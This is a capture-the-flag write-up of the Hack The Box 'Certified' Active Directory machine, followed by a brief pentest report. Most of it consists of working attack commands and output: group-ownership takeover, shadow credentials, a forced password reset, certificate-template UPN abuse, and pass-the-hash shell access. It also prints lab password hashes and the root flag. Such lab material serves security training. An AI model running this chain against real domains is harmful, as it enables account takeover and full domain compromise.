As is common in Windows pentests, you will start the Certified box with credentials for the following account: Username: judith.mader Password: judith09
Nmap Enumeration
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-01-19 11:44:23Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: certified.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-01-19T11:45:52+00:00; +7h00m02s from scanner time.
| ssl-cert: Subject: commonName=DC01.certified.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.certified.htb
| Issuer: commonName=certified-DC01-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-05-13T15:49:36
| Not valid after: 2025-05-13T15:49:36
| MD5: 4e1f:97f0:7c0a:d0ec:52e1:5f63:ec55:f3bc
|_SHA-1: 28e2:4c68:aa00:dd8b:ee91:564b:33fe:a345:116b:3828
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: certified.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-01-19T11:45:52+00:00; +7h00m02s from scanner time.
| ssl-cert: Subject: commonName=DC01.certified.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.certified.htb
| Issuer: commonName=certified-DC01-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-05-13T15:49:36
| Not valid after: 2025-05-13T15:49:36
| MD5: 4e1f:97f0:7c0a:d0ec:52e1:5f63:ec55:f3bc
|_SHA-1: 28e2:4c68:aa00:dd8b:ee91:564b:33fe:a345:116b:3828
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: certified.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-01-19T11:45:52+00:00; +7h00m02s from scanner time.
| ssl-cert: Subject: commonName=DC01.certified.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.certified.htb
| Issuer: commonName=certified-DC01-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-05-13T15:49:36
| Not valid after: 2025-05-13T15:49:36
| MD5: 4e1f:97f0:7c0a:d0ec:52e1:5f63:ec55:f3bc
|_SHA-1: 28e2:4c68:aa00:dd8b:ee91:564b:33fe:a345:116b:3828
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: certified.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.certified.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.certified.htb
| Issuer: commonName=certified-DC01-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-05-13T15:49:36
| Not valid after: 2025-05-13T15:49:36
| MD5: 4e1f:97f0:7c0a:d0ec:52e1:5f63:ec55:f3bc
|_SHA-1: 28e2:4c68:aa00:dd8b:ee91:564b:33fe:a345:116b:3828
|_ssl-date: 2025-01-19T11:45:52+00:00; +7h00m02s from scanner time.
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
49666/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49673/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49674/tcp open msrpc Microsoft Windows RPC
49682/tcp open msrpc Microsoft Windows RPC
49716/tcp open msrpc Microsoft Windows RPC
49740/tcp open msrpc Microsoft Windows RPC
49773/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
|*clock-skew: mean: 7h00m01s, deviation: 0s, median: 7h00m01s
| smb2-time:
| date: 2025-01-19T11:45:12
|* start_date: N/A
USERS
| USERNAME | PASSWORD | GROUPS | |
|---|---|---|---|
| judith.mader | judith09 | ||
| gregory.cameron | |||
| alexander.huges | |||
| ca_operator | aad3b435b51404eeaad3b435b51404ee:fb54d1c05e301e024800c6ad99fe9b45 | ||
| management_svc | a091c1832bcdd4677c28b5a6a1295584 | Management , RDP | |
| Administrator | aad3b435b51404eeaad3b435b51404ee:0d5b49608bbce1751f708748f67e2d34 |
ldap Dump
(jimmy㉿kali)-[~/HTB/rooms/certified/ldapdomain]
└─$ ldapdomaindump ldaps://10.10.11.41 -u '10.10.11.41\\judith.mader' -p 'judith09'
Bloodhound domain dump
(jimmy㉿kali)-[~/HTB/rooms/certified/ldapdomain]
└─$ sudo bloodhound-python -d certified.htb -u judith.mader -p 'judith09' -ns 10.10.11.41 -c all
SMB Share Enumeration
(jimmy㉿kali)-[~/HTB/rooms/certified]
└─$ crackmapexec smb certified.htb -u 'judith.mader' -d certified.htb -p 'judith09' --shares
SMB certified.htb 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:certified.htb) (signing:True) (SMBv1:False)
SMB certified.htb 445 DC01 [+] certified.htb\\judith.mader:judith09
SMB certified.htb 445 DC01 [+] Enumerated shares
SMB certified.htb 445 DC01 Share Permissions Remark
SMB certified.htb 445 DC01 ----- ----------- ------
SMB certified.htb 445 DC01 ADMIN$ Remote Admin
SMB certified.htb 445 DC01 C$ Default share
SMB certified.htb 445 DC01 IPC$ READ Remote IPC
SMB certified.htb 445 DC01 NETLOGON READ Logon server share
SMB certified.htb 445 DC01 SYSVOL READ Logon server share
WriteOwner takeover
bloodyAD --host "10.10.11.41" -d "certified.htb" -u "judith.mader" -p "judith09" set owner Management judith.mader
dacledit.py -action 'write' -rights 'WriteMembers' -principal 'judith.mader' -target-dn 'CN=MANAGEMENT,CN=USERS,DC=CERTIFIED,DC=HTB' 'certified.htb'/'judith.mader':'judith09'
net rpc group addmem "Management" "judith.mader" -U "certified.htb"/"judith.mader"%"judith09" -S "certified.htb"
net rpc group members "Management" -U "certified.htb"/"judith.mader"%"judith09" -S "certified.htb"
certipy-ad shadow auto -u '[email protected]' -p "judith09" -account 'management_svc' -dc-ip '10.10.11.41’
Obtained hash for Management_svc
certipy-ad shadow auto -u '[email protected]' -p 'judith09' -account 'management_svc' -dc-ip '10.10.11.41'
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Targeting user 'management_svc'
[*] Generating certificate
[*] Certificate generated
[*] Generating Key Credential
[*] Key Credential generated with DeviceID 'e33cc8ec-7bc7-ea3b-3c5a-0b2299ffb526'
[*] Adding Key Credential with device ID 'e33cc8ec-7bc7-ea3b-3c5a-0b2299ffb526' to the Key Credentials for 'management_svc'
[*] Successfully added Key Credential with device ID 'e33cc8ec-7bc7-ea3b-3c5a-0b2299ffb526' to the Key Credentials for 'management_svc'
[*] Authenticating as 'management_svc' with the certificate
[*] Using principal: [email protected]
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'management_svc.ccache'
[*] Trying to retrieve NT hash for 'management_svc'
[*] Restoring the old Key Credentials for 'management_svc'
[*] Successfully restored the old Key Credentials for 'management_svc'
[*] NT hash for 'management_svc': a091c1832bcdd4677c28b5a6a1295584
Ran Certify.exe to find vuln CA template
*Evil-WinRM* PS C:\\Users\\management_svc\\Documents> ./Certify.exe find /vuln /domain:certified.htb
CA Name : DC01.certified.htb\\certified-DC01-CA
Template Name : CertifiedAuthentication
Schema Version : 2
Validity Period : 1000 years
Renewal Period : 6 weeks
msPKI-Certificate-Name-Flag : SUBJECT_ALT_REQUIRE_UPN, SUBJECT_REQUIRE_DIRECTORY_PATH
mspki-enrollment-flag : PUBLISH_TO_DS, AUTO_ENROLLMENT, NO_SECURITY_EXTENSION
Authorized Signatures Required : 0
pkiextendedkeyusage : Client Authentication, Server Authentication
mspki-certificate-application-policy : Client Authentication, Server Authentication
Permissions
Enrollment Permissions
Enrollment Rights : CERTIFIED\\ca_operator S-1-5-21-729746778-2675978091-3820388244-1106
CERTIFIED\\Domain Admins S-1-5-21-729746778-2675978091-3820388244-512
CERTIFIED\\Enterprise Admins S-1-5-21-729746778-2675978091-3820388244-519
AutoEnrollment Rights : CERTIFIED\\ca_operator S-1-5-21-729746778-2675978091-3820388244-1106
Object Control Permissions
Owner : CERTIFIED\\Administrator S-1-5-21-729746778-2675978091-3820388244-500
WriteOwner Principals : CERTIFIED\\Administrator S-1-5-21-729746778-2675978091-3820388244-500
CERTIFIED\\Domain Admins S-1-5-21-729746778-2675978091-3820388244-512
CERTIFIED\\Enterprise Admins S-1-5-21-729746778-2675978091-3820388244-519
WriteDacl Principals : CERTIFIED\\Administrator S-1-5-21-729746778-2675978091-3820388244-500
CERTIFIED\\Domain Admins S-1-5-21-729746778-2675978091-3820388244-512
CERTIFIED\\Enterprise Admins S-1-5-21-729746778-2675978091-3820388244-519
WriteProperty Principals : CERTIFIED\\Administrator S-1-5-21-729746778-2675978091-3820388244-500
CERTIFIED\\Domain Admins S-1-5-21-729746778-2675978091-3820388244-512
CERTIFIED\\Enterprise Admins S-1-5-21-729746778-2675978091-3820388244-519
Exploited GenericAll Password change to get hash for CA_OPERATOR
(jimmy㉿kali)-[~/HTB/rooms/certified]
└─$ pth-net rpc password "ca_operator" "newP@ssword2022" -U "certified/htb"/"management_svc"%"ffffffffffffffffffffffffffffffff":"a091c1832bcdd4677c28b5a6a1295584" -S "certified.htb"
E_md4hash wrapper called.
HASH PASS: Substituting user supplied NTLM HASH...
(jimmy㉿kali)-[~/HTB/rooms/certified]
└─$ sudo ntpdate -u dc01.certified.htb
ntpdig: no eligible servers
┌──(jimmy㉿kali)-[~/HTB/rooms/certified]
└─$ certipy-ad req -u ca_operator -p 'newP@ssword2022' -ca certified-DC01-CA -target certified.htb -dc-ip 10.10.11.41 -template CertifiedAuthentication -upn [email protected] -ns 10.10.11.41 -dns 10.10.11.41 -debug
Certipy v4.8.2 - by Oliver Lyak (ly4k)
/usr/lib/python3/dist-packages/certipy/commands/req.py:459: SyntaxWarning: invalid escape sequence '\\('
"(0x[a-zA-Z0-9]+) \\([-]?[0-9]+ ",
[+] Trying to resolve 'certified.htb' at '10.10.11.41'
[+] Generating RSA key
[*] Requesting certificate via RPC
[+] Trying to connect to endpoint: ncacn_np:10.10.11.41[\\pipe\\cert]
[+] Connected to endpoint: ncacn_np:10.10.11.41[\\pipe\\cert]
[*] Successfully requested certificate
[*] Request ID is 19
[*] Got certificate with UPN '[email protected]'
[*] Certificate has no object SID
[*] Saved certificate and private key to 'ca_operator.pfx'
CA_OPERATOR HASH
(jimmy㉿kali)-[~/HTB/rooms/certified]
└─$ certipy-ad auth -pfx ca_operator.pfx -domain certified.htb
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Using principal: [email protected]
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'ca_operator.ccache'
[*] Trying to retrieve NT hash for 'ca_operator'
[*] Got hash for '[email protected]': aad3b435b51404eeaad3b435b51404ee:fb54d1c05e301e024800c6ad99fe9b45
Add CA_OPERATOR user to administrator
(jimmy㉿kali)-[~/HTB/rooms/certified]
└─$ certipy-ad account update -username [email protected] -hashes a091c1832bcdd4677c28b5a6a1295584 -user ca_operator -upn administrator
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Updating user 'ca_operator':
userPrincipalName : Administrator
[*] Successfully updated 'ca_operator'
After adding CA_OPERATOR as Administrator to Template request a new CA for Administrator User
certipy-ad req -u ca_operator -p 'newP@ssword2022' -ca certified-DC01-CA -target certified.htb -dc-ip 10.10.11.41 -template CertifiedAuthentication -upn [email protected] -ns 10.10.11.41 -dns 10.10.11.41 -debug
[us-vip-1]─[10.10.14.7]─[cb32@htb-juaup7drow]─[~/certified.htb]
└──╼ [★]$ certipy req -username [email protected] -p newP@ssword2022 -ca certified-DC01-CA -template CertifiedAuthentication -debug
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[+] Trying to resolve 'CERTIFIED.HTB' at '1.1.1.1'
[+] Resolved 'CERTIFIED.HTB' from cache: 10.10.11.41
[+] Generating RSA key
[*] Requesting certificate via RPC
[+] Trying to connect to endpoint: ncacn_np:10.10.11.41[\\pipe\\cert]
[+] Connected to endpoint: ncacn_np:10.10.11.41[\\pipe\\cert]
[*] Successfully requested certificate
[*] Request ID is 11
[*] Got certificate with UPN 'administrator'
[*] Certificate has no object SID
[*] Saved certificate and private key to 'administrator.pfx'
Make sure to sync time using VPN IP
us-vip-1]─[10.10.14.7]─[cb32@htb-juaup7drow]─[~/certified.htb]
└──╼ [★]$ sudo ntpdate -u 10.10.14.7
2025-01-23 02:21:02.10286 (-0600) -0.000022 +/- 0.000069 10.10.14.7 s3 no-leap
┌─[us-vip-1]─[10.10.14.7]─[cb32@htb-juaup7drow]─[~/certified.htb]
└──╼ [★]$ certipy auth -pfx administrator.pfx -domain certified.htb
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Using principal: [email protected]
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for '[email protected]': aad3b435b51404eeaad3b435b51404ee:0d5b49608bbce1751f708748f67e2d34
Connect to Administrator using WinRM
(jimmy㉿kali)-[~/HTB/rooms/certified]
└─$ evil-winrm -i 10.10.11.41 -u 'administrator' -H '0d5b49608bbce1751f708748f67e2d34'
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: <https://github.com/Hackplayers/evil-winrm#Remote-path-completion>
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\\Users\\Administrator\\Documents> cd ..
*Evil-WinRM* PS C:\\Users\\Administrator> cd Desktop
*Evil-WinRM* PS C:\\Users\\Administrator\\Desktop> type root.txt
0fc1e7b1b2ec1b4cec98a558934043a1
*Evil-WinRM* PS C:\\Users\\Administrator\\Desktop> exit
Penetration Testing Report: Certified Box
Objective: To exploit Active Directory (AD) vulnerabilities in the “Certified” system and gain administrator-level access.
1. Initial Access
- Credentials for the “Judith Mader” account were provided:
- Username: judith.mader
- Password: judith09
- Nmap was used to enumerate open ports and services.
2. Enumeration
- LDAP and BloodHound:
- LDAP domain dump and BloodHound identified potential targets and pathways for lateral movement.
- SMB Enumeration:
- Shared files and folders were enumerated, identifying key access points.
3. Exploitation Steps
- WriteOwner Privilege Escalation:
- Judith’s account was added to the “Management” group, granting higher privileges.
- Certificate Services Exploitation:
- A vulnerable Certificate Authority (CA) template was exploited using the
Certipytool. - This allowed privilege escalation to the “management_svc” account.
- A vulnerable Certificate Authority (CA) template was exploited using the
- Hash Dumping and Privilege Escalation:
- Using the NT hash for “management_svc,” Judith’s account was elevated further.
- The CA Operator role was exploited to issue an administrator certificate.
- Final Administrator Access:
- The administrator certificate was used to authenticate and retrieve the administrator NT hash.
- Full administrative access was achieved via Evil-WinRM.
4. Key Findings
- Vulnerable Certificate Templates:
- Improperly configured templates allowed privilege escalation.
- Weak Account Protections:
- Shared passwords and excessive permissions enabled lateral movement.
- Insufficient Monitoring:
- No detection of enumeration or exploitation activities.
5. Recommendations
Monitor authentication attempts and LDAP queries for suspicious activity.
Regularly audit certificate templates for security misconfigurations.
Implement role-based access control to limit privilege escalation opportunities.